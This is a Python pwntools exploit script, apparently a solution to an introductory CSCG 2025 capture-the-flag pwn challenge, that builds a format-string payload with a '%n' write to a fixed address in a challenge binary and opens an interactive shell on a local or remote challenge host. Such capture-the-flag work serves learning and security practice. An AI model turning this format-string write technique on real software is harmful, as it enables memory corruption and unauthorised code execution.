Files
ctf/cscg25/pwn/intro2/exploit.py
2025-03-24 22:08:34 +01:00

43 lines
951 B
Python

from pwn import *
# Set the context for the binary
context.binary = './intro-fmt' # Replace with your binary's name
# Choose local or remote
LOCAL = True # Change to False if connecting remotely
if LOCAL:
p = process(context.binary.path)
else:
p = remote("75143f5062f22bfeb9302387-1024-intro-pwn-2.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
def send_payload(payload):
p.sendline(payload)
def recv_until(delim):
return p.recvuntil(delim)
def interact():
p.interactive()
bug_addr = 0x40406c
# Example interaction
recv_until(b'What is your name?')
format_string = b""
format_string += b"%0.0s" * 5
format_string += b"%0.0s" * 10
format_string += b"%n"
format_string += b"\n" * (8 - (len(format_string) % 8))
print(len(format_string) / 8)
format_string += p64(bug_addr)
print(format_string)
print("enter if gdb attached")
input()
send_payload(format_string)
interact() # Keep the shell open